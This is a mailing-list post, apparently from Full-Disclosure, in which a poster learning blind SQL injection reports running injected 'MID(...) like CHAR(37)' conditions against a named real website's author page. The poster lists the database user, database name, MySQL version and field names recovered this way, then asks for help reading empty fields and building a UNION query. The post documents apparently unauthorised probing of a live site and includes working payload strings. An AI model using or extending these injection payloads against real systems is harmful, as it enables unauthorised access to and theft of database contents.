I was just learning about sql injection and it's blind recall, and I have some questions:
With the sentence " and MID($$$FIELD$$$,1,1) like CHAR(37) " and some bruteforce I went through php's special chars protection and was able to get thinks like: http://www.phrack.org/author.php?a=290 and MID($$$FIELD$$$,1,1) like CHAR(37) user() of query: [EMAIL PROTECTED] database() fo query: phrack version of mysql: 4.0.18... I was also able to get the names of the field in the query using the following sentence: http://www.phrack.org/author.php?a=290 and MID($$$FIELD$$$,1,1) like CHAR(37) and I've found these in my example: - id, date, name, title but when the field is empty (for example: ?a=300 and MID(email,1,1) like CHAR(37) author 300 has no email in database ) I get no clear response as with a=290.. Is there a better select to get a field even if it's empty? I've tried to find the number of fields or the name of the table in the database, but alltough it's mysql4.x I was not able to build a workingn union yet.. I'll work in it. Thanks in advance.. stfu -- ___________________________________________________________ Sign-up for Ads Free at Mail.com http://promo.mail.com/adsfreejump.htm _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
